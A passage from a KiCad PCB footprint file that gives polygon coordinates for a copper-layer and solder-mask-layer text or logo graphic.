-7.613706) (xy -4.840111 -7.610591) (xy -4.671326 -7.58122) (xy -4.549346 -7.529504) (xy -4.530323 -7.514761) (xy -4.468669 -7.463727) (xy -4.447385 -7.474053) (xy -4.445 -7.528772) (xy -4.418843 -7.603356) (xy -4.357716 -7.62) (xy -4.327098 -7.617196)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy -8.974667 -7.260167) (xy -8.97496 -6.960585) (xy -8.976493 -6.735145) (xy -8.980244 -6.57332) (xy -8.987193 -6.464586) (xy -8.998319 -6.398417) (xy -9.014601 -6.364288) (xy -9.037017 -6.351674) (xy -9.059333 -6.35) (xy -9.1287 -6.378316) (xy -9.145287 -6.44525) (xy -9.150889 -6.508789) (xy -9.172897 -6.4941) (xy -9.188792 -6.468083) (xy -9.255541 -6.409676) (xy -9.365717 -6.358873) (xy -9.388588 -6.351903) (xy -9.524735 -6.320656) (xy -9.638134 -6.317538) (xy -9.767573 -6.337432) (xy -9.884465 -6.386075) (xy -9.964818 -6.485499) (xy -10.012683 -6.645057) (xy -10.032107 -6.874097) (xy -10.033 -6.950478) (xy -10.032429 -6.963833) (xy -9.8425 -6.963833) (xy -9.833018 -6.762219) (xy -9.805583 -6.628858) (xy -9.7844 -6.58934) (xy -9.697069 -6.539685) (xy -9.564376 -6.519066) (xy -9.420486 -6.527479) (xy -9.299569 -6.564921) (xy -9.26375 -6.589395) (xy -9.221002 -6.646978) (xy -9.196932 -6.736972) (xy -9.187196 -6.880588) (xy -9.186333 -6.967371) (xy -9.19452 -7.166502) (xy -9.226246 -7.296027) (xy -9.292263 -7.370034) (xy -9.403324 -7.402612) (xy -9.52284 -7.408333) (xy -9.666764 -7.397703) (xy -9.760534 -7.356424) (xy -9.814281 -7.270409) (xy -9.838133 -7.125575) (xy -9.8425 -6.963833) (xy -10.032429 -6.963833) (xy -10.021814 -7.21202) (xy -9.986386 -7.399823) (xy -9.92391 -7.52206) (xy -9.831582 -7.5869) (xy -9.812446 -7.592875) (xy -9.621958 -7.618115) (xy -9.430521 -7.601519) (xy -9.30275 -7.55875) (xy -9.186333 -7.498021) (xy -9.186333 -7.834177) (xy -9.185185 -8.001385) (xy -9.178101 -8.101265) (xy -9.159621 -8.151157) (xy -9.124289 -8.168398) (xy -9.0805 -8.170333) (xy -8.974667 -8.170333) (xy -8.974667 -7.260167)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy -7.891808 -7.610548) (xy -7.721183 -7.5632) (xy -7.610033 -7.463198) (xy -7.550719 -7.304093) (xy -7.535333 -7.110008) (xy -7.535333 -6.900333) (xy -8.382 -6.900333) (xy -8.382 -6.776357) (xy -8.366714 -6.66127) (xy -8.312487 -6.585046) (xy -8.206769 -6.540803) (xy -8.037008 -6.521659) (xy -7.91331 -6.519333) (xy -7.744856 -6.517295) (xy -7.644136 -6.508533) (xy -7.594262 -6.489076) (xy -7.578346 -6.454955) (xy -7.577667 -6.440421) (xy -7.616309 -6.381709) (xy -7.720003 -6.33988) (xy -7.870399 -6.317227) (xy -8.049151 -6.316043) (xy -8.237908 -6.338621) (xy -8.295265 -6.350728) (xy -8.409959 -6.394216) (xy -8.49103 -6.453363) (xy -8.494612 -6.457944) (xy -8.546074 -6.577611) (xy -8.578843 -6.757646) (xy -8.590117 -6.975256) (xy -8.581452 -7.164723) (xy -8.577089 -7.191483) (xy -8.382 -7.191483) (xy -8.382 -7.069667) (xy -7.69794 -7.069667) (xy -7.72693 -7.20725) (xy -7.763812 -7.33088) (xy -7.823365 -7.398269) (xy -7.928275 -7.425577) (xy -8.038944 -7.4295) (xy -8.219868 -7.409379) (xy -8.331363 -7.346346) (xy -8.379196 -7.236402) (xy -8.382 -7.191483) (xy -8.577089 -7.191483) (xy -8.549291 -7.361937) (xy -8.485559 -7.491069) (xy -8.375116 -7.567093) (xy -8.202822 -7.604985) (xy -8.129546 -7.611692) (xy -7.891808 -7.610548)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy -6.446255 -7.597278) (xy -6.36716 -7.548664) (xy -6.35 -7.492843) (xy -6.357552 -7.447009) (xy -6.393315 -7.425761) (xy -6.47695 -7.424527) (xy -6.596901 -7.435438) (xy -6.802587 -7.44198) (xy -6.938404 -7.408938) (xy -7.010782 -7.333428) (xy -7.027333 -7.242448) (xy -7.006866 -7.151803) (xy -6.936772 -7.097807) (xy -6.804017 -7.073484) (xy -6.705567 -7.070245) (xy -6.565635 -7.054864) (xy -6.443641 -7.024119) (xy -6.329837 -6.94383) (xy -6.27479 -6.804334) (xy -6.279436 -6.608271) (xy -6.284931 -6.576311) (xy -6.339953 -6.449459) (xy -6.452556 -6.365573) (xy -6.627826 -6.32309) (xy -6.870847 -6.320446) (xy -7.059083 -6.338291) (xy -7.160804 -6.36636) (xy -7.196089 -6.423465) (xy -7.196667 -6.435637) (xy -7.187841 -6.475642) (xy -7.150337 -6.500998) (xy -7.067619 -6.516088) (xy -6.923149 -6.525295) (xy -6.847417 -6.528205) (xy -6.498167 -6.5405) (xy -6.498167 -6.836833) (xy -6.812674 -6.888874) (xy -6.970952 -6.919843) (xy -7.097832 -6.953449) (xy -7.168684 -6.983027) (xy -7.172507 -6.986241) (xy -7.199104 -7.052686) (xy -7.21541 -7.17021) (xy -7.217833 -7.239605) (xy -7.202991 -7.404098) (xy -7.149321 -7.511677) (xy -7.04311 -7.575117) (xy -6.870641 -7.607194) (xy -6.818492 -7.611599) (xy -6.594805 -7.617776) (xy -6.446255 -7.597278)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy -1.610155 -7.589596) (xy -1.527279 -7.558196) (xy -1.438985 -7.49323) (xy -1.385755 -7.397484) (xy -1.360361 -7.25177) (xy -1.355245 -7.101417) (xy -1.354667 -6.900333) (xy -2.201333 -6.900333) (xy -2.201333 -6.776357) (xy -2.186047 -6.66127) (xy -2.13182 -6.585046) (xy -2.026102 -6.540803) (xy -1.856341 -6.521659) (xy -1.732643 -6.519333) (xy -1.564189 -6.517295) (xy -1.46347 -6.508533) (xy -1.413596 -6.489076) (xy -1.39768 -6.454955) (xy -1.397 -6.440421) (xy -1.436047 -6.381458) (xy -1.542701 -6.33982) (xy -1.701234 -6.317878) (xy -1.895919 -6.318005) (xy -2.079707 -6.337486) (xy -2.219927 -6.390738) (xy -2.317957 -6.504884) (xy -2.378103 -6.68673) (xy -2.398694 -6.841671) (xy -2.404624 -7.123207) (xy -2.397178 -7.167409) (xy -2.201333 -7.167409) (xy -2.196768 -7.119192) (xy -2.171669 -7.090173) (xy -2.108928 -7.075489) (xy -1.991441 -7.07028) (xy -1.857375 -7.069667) (xy -1.513417 -7.069667) (xy -1.540669 -7.205927) (xy -1.576759 -7.327661) (xy -1.637877 -7.395732) (xy -1.745342 -7.424692) (xy -1.868196 -7.4295) (xy -2.043961 -7.407195) (xy -2.152322 -7.337437) (xy -2.198697 -7.215965) (xy -2.201333 -7.167409) (xy -2.397178 -7.167409) (xy -2.369014 -7.334572) (xy -2.290537 -7.480103) (xy -2.179033 -7.559702) (xy -1.998422 -7.606721) (xy -1.796046 -7.616656) (xy -1.610155 -7.589596)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy 0.084667 -6.35) (xy -0.021167 -6.35) (xy -0.107998 -6.373433) (xy -0.127 -6.420061) (xy -0.133095 -6.466549) (xy -0.16581 -6.453693) (xy -0.204177 -6.420278) (xy -0.32181 -6.358933) (xy -0.484004 -6.3282) (xy -0.655195 -6.331346) (xy -0.789155 -6.366558) (xy -0.898902 -6.446944) (xy -0.970315 -6.576857) (xy -1.006236 -6.765656) (xy -1.009061 -6.987608) (xy -0.806712 -6.987608) (xy -0.798102 -6.823151) (xy -0.777238 -6.683014) (xy -0.744671 -6.594133) (xy -0.73781 -6.585857) (xy -0.643174 -6.539181) (xy -0.504888 -6.520899) (xy -0.359231 -6.53147) (xy -0.242477 -6.571354) (xy -0.230341 -6.579421) (xy -0.186629 -6.6253) (xy -0.161467 -6.697238) (xy -0.150234 -6.816302) (xy -0.148167 -6.953915) (xy -0.155081 -7.156075) (xy -0.182809 -7.288398) (xy -0.241827 -7.36508) (xy -0.342613 -7.400316) (xy -0.48355 -7.408333) (xy -0.618806 -7.399044) (xy -0.721773 -7.375331) (xy -0.753533 -7.357533) (xy -0.784976 -7.281735) (xy -0.802519 -7.149447) (xy -0.806712 -6.987608) (xy -1.009061 -6.987608) (xy -1.009508 -7.022702) (xy -1.006541 -7.082326) (xy -0.993645 -7.257104) (xy -0.974952 -7.370236) (xy -0.943409 -7.444733) (xy -0.891969 -7.503607) (xy -0.872063 -7.521267) (xy -0.724507 -7.598398) (xy -0.54381 -7.623708) (xy -0.364243 -7.596603) (xy -0.238543 -7.532261) (xy -0.127 -7.444522) (xy -0.127 -7.807428) (xy -0.126049 -7.982573) (xy -0.119949 -8.089744) (xy -0.103833 -8.145633) (xy -0.072834 -8.166932) (xy -0.022083 -8.170333) (xy 0.084667 -8.170333) (xy 0.084667 -6.35)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy -5.787963 -7.594295) (xy -5.764526 -7.572234) (xy -5.748567 -7.519985) (xy -5.738132 -7.424882) (xy -5.731264 -7.274259) (xy -5.72601 -7.05545) (xy -5.724452 -6.974417) (xy -5.712737 -6.35) (xy -5.92893 -6.35) (xy -5.917215 -6.974417) (xy -5.912063 -7.216208) (xy -5.905886 -7.386004) (xy -5.896729 -7.49647) (xy -5.882637 -7.560274) (xy -5.861654 -7.59008) (xy -5.831826 -7.598557) (xy -5.820833 -7.598833) (xy -5.787963 -7.594295)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy -3.678738 -7.584405) (xy -3.65249 -7.533641) (xy -3.630443 -7.47495) (xy -3.594165 -7.481936) (xy -3.549964 -7.519629) (xy -3.455357 -7.568254) (xy -3.309217 -7.602948) (xy -3.240908 -7.610976) (xy -3.100042 -7.617347) (xy -3.009855 -7.60125) (xy -2.937477 -7.553941) (xy -2.902897 -7.521079) (xy -2.857694 -7.472093) (xy -2.827119 -7.420885) (xy -2.808317 -7.350678) (xy -2.798434 -7.244694) (xy -2.794614 -7.086155) (xy -2.794 -6.881091) (xy -2.794766 -6.661022) (xy -2.798524 -6.511885) (xy -2.807461 -6.419953) (xy -2.823767 -6.371495) (xy -2.849631 -6.352781) (xy -2.878667 -6.35) (xy -2.917681 -6.356131) (xy -2.942738 -6.384857) (xy -2.957175 -6.451674) (xy -2.964331 -6.572081) (xy -2.967541 -6.761575) (xy -2.967553 -6.76275) (xy -2.971394 -7.004175) (xy -2.981423 -7.173657) (xy -3.004037 -7.283918) (xy -3.045633 -7.347683) (xy -3.112606 -7.377673) (xy -3.211355 -7.386613) (xy -3.281492 -7.387167) (xy -3.425409 -7.38336) (xy -3.509558 -7.366197) (xy -3.558703 -7.327069) (xy -3.585876 -7.281333) (xy -3.612593 -7.182784) (xy -3.631207 -7.018862) (xy -3.639726 -6.808641) (xy -3.640043 -6.76275) (xy -3.641554 -6.572925) (xy -3.647529 -6.452247) (xy -3.661173 -6.385207) (xy -3.685691 -6.356296) (xy -3.724289 -6.350002) (xy -3.725333 -6.35) (xy -3.757873 -6.354161) (xy -3.780802 -6.37503) (xy -3.795795 -6.425183) (xy -3.804531 -6.517198) (xy -3.808686 -6.663652) (xy -3.809937 -6.877123) (xy -3.81 -6.985) (xy -3.809001 -7.231839) (xy -3.805145 -7.406122) (xy -3.797148 -7.519948) (xy -3.783724 -7.585413) (xy -3.763589 -7.614615) (xy -3.742537 -7.62) (xy -3.678738 -7.584405)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy -5.740273 -8.152849) (xy -5.715447 -8.084004) (xy -5.715 -8.0645) (xy -5.732485 -7.983939) (xy -5.80133 -7.959114) (xy -5.820833 -7.958667) (xy -5.901394 -7.976152) (xy -5.92622 -8.044997) (xy -5.926667 -8.0645) (xy -5.909182 -8.145061) (xy -5.840337 -8.169887) (xy -5.820833 -8.170333) (xy -5.740273 -8.152849)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy -3.894667 0.254) (xy -4.148667 0.254) (xy -4.289519 0.251646) (xy -4.365574 0.239252) (xy -4.396675 0.208819) (xy -4.402667 0.152351) (xy -4.402667 0.151629) (xy -4.412346 0.01925) (xy -4.445091 -0.033022) (xy -4.506463 -0.007918) (xy -4.579028 0.065036) (xy -4.697845 0.171585) (xy -4.843985 0.241998) (xy -5.034919 0.28162) (xy -5.28812 0.2958) (xy -5.334 0.296064) (xy -5.548329 0.286916) (xy -5.71094 0.255445) (xy -5.830165 0.207829) (xy -5.953229 0.130289) (xy -6.04635 0.023786) (xy -6.122542 -0.11303) (xy -6.171966 -0.223116) (xy -6.20619 -0.3294) (xy -6.228973 -0.453258) (xy -6.244073 -0.616065) (xy -6.255247 -0.839197) (xy -6.256699 -0.876126) (xy -6.260421 -1.235619) (xy -5.709415 -1.235619) (xy -5.708569 -0.950042) (xy -5.699408 -0.808236) (xy -5.663857 -0.566138) (xy -5.601251 -0.396704) (xy -5.507035 -0.290977) (xy -5.414851 -0.248644) (xy -5.238415 -0.220779) (xy -5.036538 -0.220124) (xy -4.850424 -0.245224) (xy -4.764433 -0.271631) (xy -4.650204 -0.330643) (xy -4.568726 -0.406542) (xy -4.514802 -0.513498) (xy -4.483237 -0.665687) (xy -4.468834 -0.877282) (xy -4.466167 -1.085117) (xy -4.47147 -1.35127) (xy -4.491296 -1.54713) (xy -4.531517 -1.686629) (xy -4.598004 -1.783697) (xy -4.696631 -1.852267) (xy -4.808877 -1.898124) (xy -4.991641 -1.935869) (xy -5.189207 -1.937417) (xy -5.374505 -1.90619) (xy -5.52047 -1.845612) (xy -5.573857 -1.801389) (xy -5.640213 -1.675899) (xy -5.686015 -1.48244) (xy -5.709415 -1.235619) (xy -6.260421 -1.235619) (xy -6.260842 -1.27621) (xy -6.237875 -1.60428) (xy -6.185448 -1.869285) (xy -6.10121 -2.080177) (xy -5.982812 -2.245906) (xy -5.870892 -2.345424) (xy -5.781183 -2.395404) (xy -5.661233 -2.426903) (xy -5.48803 -2.445101) (xy -5.409379 -2.449341) (xy -5.116451 -2.446835) (xy -4.885693 -2.406685) (xy -4.70154 -2.324788) (xy -4.582583 -2.231542) (xy -4.445 -2.100058) (xy -4.445 -3.683) (xy -3.894667 -3.683) (xy -3.894667 0.254)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy -1.804068 -2.444768) (xy -1.525568 -2.413853) (xy -1.311485 -2.355738) (xy -1.152703 -2.266009) (xy -1.040106 -2.140253) (xy -0.964578 -1.974057) (xy -0.935106 -1.861819) (xy -0.921392 -1.755269) (xy -0.909329 -1.579732) (xy -0.899536 -1.350881) (xy -0.892634 -1.084389) (xy -0.889243 -0.795928) (xy -0.889 -0.696416) (xy -0.889 0.254) (xy -1.389558 0.254) (xy -1.417775 0.086985) (xy -1.445992 -0.080029) (xy -1.56763 0.058509) (xy -1.687464 0.161057) (xy -1.82805 0.237414) (xy -1.854962 0.24669) (xy -2.040079 0.282284) (xy -2.263115 0.296136) (xy -2.493888 0.289155) (xy -2.702214 0.262248) (xy -2.8575 0.216516) (xy -3.006995 0.125069) (xy -3.107969 0.003013) (xy -3.167224 -0.164337) (xy -3.19156 -0.391668) (xy -3.192244 -0.446663) (xy -2.656914 -0.446663) (xy -2.64777 -0.389818) (xy -2.608235 -0.291369) (xy -2.532325 -0.226827) (xy -2.40701 -0.191469) (xy -2.219259 -0.180573) (xy -2.078466 -0.183531) (xy -1.90174 -0.192307) (xy -1.786777 -0.206746) (xy -1.710681 -0.233768) (xy -1.65056 -0.280291) (xy -1.607872 -0.325754) (xy -1.53651 -0.436799) (xy -1.482141 -0.57771) (xy -1.451121 -0.721176) (xy -1.449804 -0.839886) (xy -1.474529 -0.898796) (xy -1.537378 -0.918266) (xy -1.663177 -0.928608) (xy -1.830808 -0.930722) (xy -2.019149 -0.925505) (xy -2.207081 -0.913856) (xy -2.373485 -0.896673) (xy -2.497239 -0.874854) (xy -2.55366 -0.852897) (xy -2.617749 -0.754772) (xy -2.654445 -0.608149) (xy -2.656914 -0.446663) (xy -3.192244 -0.446663) (xy -3.193008 -0.508) (xy -3.178631 -0.766753) (xy -3.135729 -0.958346) (xy -3.058546 -1.097166) (xy -2.941323 -1.1976) (xy -2.9097 -1.215913) (xy -2.838551 -1.245955) (xy -2.742547 -1.268183) (xy -2.607464 -1.284164) (xy -2.419082 -1.295469) (xy -2.163177 -1.303666) (xy -2.101135 -1.305104) (xy -1.429436 -1.319949) (xy -1.457981 -1.535131) (xy -1.491829 -1.720855) (xy -1.539701 -1.839735) (xy -1.610643 -1.909447) (xy -1.661539 -1.932802) (xy -1.736121 -1.944073) (xy -1.877883 -1.952721) (xy -2.06936 -1.958132) (xy -2.293091 -1.959693) (xy -2.404557 -1.95892) (xy -3.05228 -1.951503) (xy -3.039557 -2.171131) (xy -3.026833 -2.39076) (xy -2.8575 -2.420607) (xy -2.748727 -2.43247) (xy -2.578815 -2.442532) (xy -2.371288 -2.44971) (xy -2.1561 -2.452894) (xy -1.804068 -2.444768)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy 5.868926 -2.452334) (xy 6.069704 -2.442273) (xy 6.19125 -2.428162) (xy 6.35 -2.401922) (xy 6.35 -1.919013) (xy 6.085417 -1.956548) (xy 5.884266 -1.97302) (xy 5.672303 -1.970807) (xy 5.477091 -1.951867) (xy 5.326193 -1.918157) (xy 5.281521 -1.899462) (xy 5.201015 -1.836094) (xy 5.143659 -1.737314) (xy 5.106405 -1.591045) (xy 5.086203 -1.385207) (xy 5.080002 -1.107724) (xy 5.08 -1.101409) (xy 5.086429 -0.81064) (xy 5.107711 -0.592033) (xy 5.146834 -0.433917) (xy 5.206789 -0.324624) (xy 5.290564 -0.252484) (xy 5.298666 -0.24781) (xy 5.391147 -0.219928) (xy 5.551801 -0.203805) (xy 5.787291 -0.198908) (xy 5.897053 -0.199868) (xy 6.396605 -0.207266) (xy 6.383886 0.01255) (xy 6.372585 0.142435) (xy 6.349004 0.211887) (xy 6.29943 0.245126) (xy 6.244167 0.259341) (xy 6.099603 0.278346) (xy 5.904167 0.288468) (xy 5.681642 0.290223) (xy 5.455813 0.284124) (xy 5.250466 0.270688) (xy 5.089385 0.250429) (xy 5.0165 0.232748) (xy 4.814228 0.118105) (xy 4.657171 -0.059844) (xy 4.565609 -0.262926) (xy 4.541794 -0.395527) (xy 4.525089 -0.590956) (xy 4.515466 -0.827675) (xy 4.512898 -1.084144) (xy 4.51736 -1.338827) (xy 4.528823 -1.570185) (xy 4.547262 -1.75668) (xy 4.567599 -1.861132) (xy 4.659716 -2.05509) (xy 4.8065 -2.229372) (xy 4.984021 -2.35949) (xy 5.102121 -2.408116) (xy 5.234543 -2.430849) (xy 5.424429 -2.446127) (xy 5.644862 -2.453454) (xy 5.868926 -2.452334)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy -7.374836 -1.59552) (xy -7.241919 -1.225076) (xy -7.118262 -0.879146) (xy -7.006739 -0.565864) (xy -6.910224 -0.293364) (xy -6.83159 -0.069779) (xy -6.773711 0.096757) (xy -6.739462 0.19811) (xy -6.731 0.226668) (xy -6.769727 0.240218) (xy -6.871824 0.247076) (xy -7.016168 0.245946) (xy -7.033889 0.245271) (xy -7.336778 0.232833) (xy -7.631536 -0.592667) (xy -8.409982 -0.592667) (xy -8.684167 -0.59237) (xy -8.885588 -0.590548) (xy -9.02615 -0.585806) (xy -9.117757 -0.576748) (xy -9.172312 -0.561978) (xy -9.20172 -0.540101) (xy -9.217883 -0.509722) (xy -9.222402 -0.497417) (xy -9.252477 -0.413238) (xy -9.301606 -0.27587) (xy -9.360304 -0.111834) (xy -9.373816 -0.074083) (xy -9.491257 0.254) (xy -9.786399 0.254) (xy -9.948067 0.249899) (xy -10.037941 0.23593) (xy -10.068569 0.209591) (xy -10.067854 0.197921) (xy -10.051084 0.147472) (xy -10.008616 0.025714) (xy -9.94342 -0.158997) (xy -9.858467 -0.398304) (xy -9.756728 -0.683853) (xy -9.641173 -1.007286) (xy -9.592573 -1.143) (xy -9.014905 -1.143) (xy -7.825961 -1.143) (xy -7.855597 -1.23825) (xy -7.915503 -1.422152) (xy -7.988477 -1.632915) (xy -8.069303 -1.856971) (xy -8.152766 -2.080752) (xy -8.23365 -2.290691) (xy -8.306739 -2.47322) (xy -8.366817 -2.61477) (xy -8.408669 -2.701774) (xy -8.42619 -2.722544) (xy -8.450669 -2.672803) (xy -8.49755 -2.557255) (xy -8.561392 -2.39005) (xy -8.636752 -2.185339) (xy -8.691775 -2.032) (xy -8.773643 -1.802138) (xy -8.848723 -1.592477) (xy -8.911081 -1.419498) (xy -8.954788 -1.299678) (xy -8.969877 -1.259417) (xy -9.014905 -1.143) (xy -9.592573 -1.143) (xy -9.514774 -1.360248) (xy -9.420715 -1.622413) (xy -8.787264 -3.386667) (xy -8.018672 -3.386667) (xy -7.374836 -1.59552)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy 1.565547 -2.43917) (xy 1.762773 -2.386633) (xy 1.914199 -2.291656) (xy 1.996779 -2.203221) (xy 2.1027 -2.067879) (xy 2.176483 -2.180487) (xy 2.313518 -2.313797) (xy 2.518711 -2.404163) (xy 2.785981 -2.449348) (xy 2.921 -2.454338) (xy 3.170494 -2.441128) (xy 3.355883 -2.394439) (xy 3.49388 -2.306021) (xy 3.601197 -2.167629) (xy 3.637022 -2.101006) (xy 3.668499 -2.034079) (xy 3.69304 -1.968013) (xy 3.71176 -1.891127) (xy 3.725772 -1.791742) (xy 3.736192 -1.658177) (xy 3.744133 -1.478753) (xy 3.750711 -1.241791) (xy 3.757038 -0.935609) (xy 3.759205 -0.820423) (xy 3.7792 0.254) (xy 3.179277 0.254) (xy 3.166555 -0.760568) (xy 3.161622 -1.08988) (xy 3.155629 -1.344453) (xy 3.147864 -1.534211) (xy 3.137617 -1.669082) (xy 3.124179 -1.758992) (xy 3.106838 -1.813866) (xy 3.089324 -1.839565) (xy 2.986734 -1.895389) (xy 2.83137 -1.928154) (xy 2.65277 -1.93463) (xy 2.480474 -1.911582) (xy 2.465761 -1.907808) (xy 2.369785 -1.877148) (xy 2.294666 -1.836257) (xy 2.237635 -1.775071) (xy 2.195921 -1.683524) (xy 2.166752 -1.551552) (xy 2.147359 -1.369088) (xy 2.134971 -1.126067) (xy 2.126818 -0.812425) (xy 2.124153 -0.66675) (xy 2.108375 0.254) (xy 1.566333 0.254) (xy 1.566097 -0.645583) (xy 1.564462 -0.997566) (xy 1.558643 -1.274577) (xy 1.546955 -1.486277) (xy 1.527719 -1.642324) (xy 1.499251 -1.752376) (xy 1.459868 -1.826094) (xy 1.40789 -1.873135) (xy 1.347413 -1.901185) (xy 1.13172 -1.945119) (xy 0.92616 -1.930995) (xy 0.748677 -1.864538) (xy 0.617216 -1.751474) (xy 0.563306 -1.651) (xy 0.543346 -1.544863) (xy 0.527827 -1.359635) (xy 0.517032 -1.100792) (xy 0.511242 -0.773806) (xy 0.510389 -0.624417) (xy 0.508 0.254) (xy -0.042333 0.254) (xy -0.042333 -2.413) (xy 0.465667 -2.413) (xy 0.465667 -2.243667) (xy 0.476447 -2.122091) (xy 0.506281 -2.078963) (xy 0.551409 -2.116498) (xy 0.582499 -2.174758) (xy 0.677679 -2.288279) (xy 0.839935 -2.376876) (xy 1.053823 -2.434557) (xy 1.303898 -2.455332) (xy 1.305892 -2.455333) (xy 1.565547 -2.43917)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy 7.62 0.254) (xy 7.027333 0.254) (xy 7.027333 -2.413) (xy 7.62 -2.413) (xy 7.62 0.254)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy 8.73125 -3.674437) (xy 8.995833 -3.661833) (xy 9.018361 -1.354667) (xy 9.163453 -1.354667) (xy 9.221573 -1.35891) (xy 9.275645 -1.378114) (xy 9.33597 -1.421993) (xy 9.412853 -1.500261) (xy 9.516595 -1.622632) (xy 9.657499 -1.798818) (xy 9.723689 -1.882865) (xy 10.138833 -2.411064) (xy 10.448248 -2.412032) (xy 10.594445 -2.40851) (xy 10.697539 -2.398315) (xy 10.738336 -2.383518) (xy 10.737758 -2.380792) (xy 10.706113 -2.338885) (xy 10.630238 -2.241952) (xy 10.518855 -2.10103) (xy 10.380688 -1.927156) (xy 10.230982 -1.73953) (xy 9.744112 -1.130474) (xy 10.248389 -0.460722) (xy 10.402722 -0.254663) (xy 10.537968 -0.072017) (xy 10.646411 0.076627) (xy 10.720337 0.180675) (xy 10.75203 0.229538) (xy 10.752667 0.231515) (xy 10.713819 0.242351) (xy 10.611195 0.250324) (xy 10.465676 0.253929) (xy 10.440888 0.254) (xy 10.129109 0.254) (xy 9.71064 -0.296333) (xy 9.55309 -0.501947) (xy 9.435996 -0.649073) (xy 9.349588 -0.74738) (xy 9.284095 -0.806539) (xy 9.229746 -0.836221) (xy 9.17677 -0.846096) (xy 9.154585 -0.846667) (xy 9.017 -0.846667) (xy 9.017 0.254) (xy 8.466667 0.254) (xy 8.466667 -3.68704) (xy 8.73125 -3.674437)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy 6.118133 -3.676738) (xy 6.186467 -3.66129) (xy 6.192111 -3.657444) (xy 6.17939 -3.614971) (xy 6.12493 -3.520288) (xy 6.038107 -3.388686) (xy 5.958479 -3.276444) (xy 5.69929 -2.921) (xy 5.400228 -2.9221) (xy 5.101167 -2.9232) (xy 4.85775 -3.259917) (xy 4.753802 -3.407869) (xy 4.671987 -3.532236) (xy 4.623209 -3.616003) (xy 4.614333 -3.639817) (xy 4.651795 -3.667269) (xy 4.744986 -3.682132) (xy 4.777526 -3.683) (xy 4.870326 -3.675349) (xy 4.949967 -3.643362) (xy 5.038757 -3.573493) (xy 5.159005 -3.452193) (xy 5.160922 -3.450167) (xy 5.268927 -3.338805) (xy 5.353905 -3.256458) (xy 5.40005 -3.218328) (xy 5.403014 -3.217333) (xy 5.440044 -3.246314) (xy 5.517779 -3.322877) (xy 5.620528 -3.431456) (xy 5.637699 -3.450167) (xy 5.755639 -3.573191) (xy 5.842922 -3.643778) (xy 5.921583 -3.675765) (xy 6.008525 -3.683) (xy 6.118133 -3.676738)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy 7.995895 -3.677474) (xy 8.093657 -3.663034) (xy 8.128 -3.64418) (xy 8.100585 -3.599404) (xy 8.026269 -3.507783) (xy 7.916946 -3.383394) (xy 7.806102 -3.26318) (xy 7.66447 -3.114052) (xy 7.56395 -3.016099) (xy 7.487913 -2.958567) (xy 7.419734 -2.930705) (xy 7.342786 -2.921762) (xy 7.276935 -2.921) (xy 7.157601 -2.9247) (xy 7.082682 -2.934139) (xy 7.069667 -2.94115) (xy 7.09278 -2.981774) (xy 7.155246 -3.075747) (xy 7.246752 -3.207848) (xy 7.32778 -3.32215) (xy 7.585894 -3.683) (xy 7.856947 -3.683) (xy 7.995895 -3.677474)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy -8.423685 -4.73075) (xy -8.419996 -4.533287) (xy -8.410493 -4.363608) (xy -8.396692 -4.241743) (xy -8.382896 -4.191) (xy -8.309119 -4.145755) (xy -8.159873 -4.127891) (xy -8.126132 -4.1275) (xy -7.995116 -4.134063) (xy -7.903095 -4.162099) (xy -7.843287 -4.22413) (xy -7.808912 -4.332678) (xy -7.793189 -4.500263) (xy -7.789337 -4.739407) (xy -7.789333 -4.749425) (xy -7.789333 -5.207) (xy -7.577667 -5.207) (xy -7.577667 -4.514817) (xy -7.580176 -4.204248) (xy -7.589446 -3.966915) (xy -7.608096 -3.79149) (xy -7.638741 -3.666644) (xy -7.683999 -3.58105) (xy -7.746486 -3.523378) (xy -7.814869 -3.487946) (xy -7.918733 -3.460315) (xy -8.063405 -3.440636) (xy -8.22273 -3.430043) (xy -8.370557 -3.429673) (xy -8.48073 -3.440658) (xy -8.523111 -3.457222) (xy -8.546872 -3.519064) (xy -8.551333 -3.567862) (xy -8.542003 -3.617386) (xy -8.499439 -3.635213) (xy -8.401779 -3.62764) (xy -8.363129 -3.622057) (xy -8.199125 -3.614331) (xy -8.037867 -3.634334) (xy -7.904417 -3.676201) (xy -7.823833 -3.734063) (xy -7.814853 -3.750422) (xy -7.795996 -3.840871) (xy -7.789333 -3.942863) (xy -7.793879 -4.02807) (xy -7.821207 -4.041743) (xy -7.88342 -4.002901) (xy -8.010772 -3.952832) (xy -8.177652 -3.935959) (xy -8.348046 -3.951424) (xy -8.485942 -3.998372) (xy -8.514894 -4.017902) (xy -8.55589 -4.056013) (xy -8.584441 -4.102779) (xy -8.603368 -4.17381) (xy -8.615492 -4.284714) (xy -8.623634 -4.4511) (xy -8.629668 -4.652902) (xy -8.644503 -5.207) (xy -8.424333 -5.207) (xy -8.423685 -4.73075)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy -9.948482 -5.750263) (xy -9.9232 -5.717698) (xy -9.910562 -5.642607) (xy -9.906312 -5.507959) (xy -9.906 -5.418667) (xy -9.902348 -5.261609) (xy -9.892643 -5.143607) (xy -9.87876 -5.084586) (xy -9.87425 -5.081347) (xy -9.819125 -5.105451) (xy -9.760326 -5.144847) (xy -9.661418 -5.183779) (xy -9.515581 -5.203664) (xy -9.358673 -5.203207) (xy -9.226551 -5.181107) (xy -9.188003 -5.16556) (xy -9.102129 -5.072883) (xy -9.045264 -4.905048) (xy -9.018815 -4.666935) (xy -9.017 -4.572) (xy -9.032913 -4.311368) (xy -9.079714 -4.119373) (xy -9.155998 -4.000896) (xy -9.188003 -3.97844) (xy -9.272735 -3.955114) (xy -9.406342 -3.940083) (xy -9.50105 -3.937) (xy -9.661583 -3.946405) (xy -9.765912 -3.979352) (xy -9.821333 -4.021667) (xy -9.882022 -4.078929) 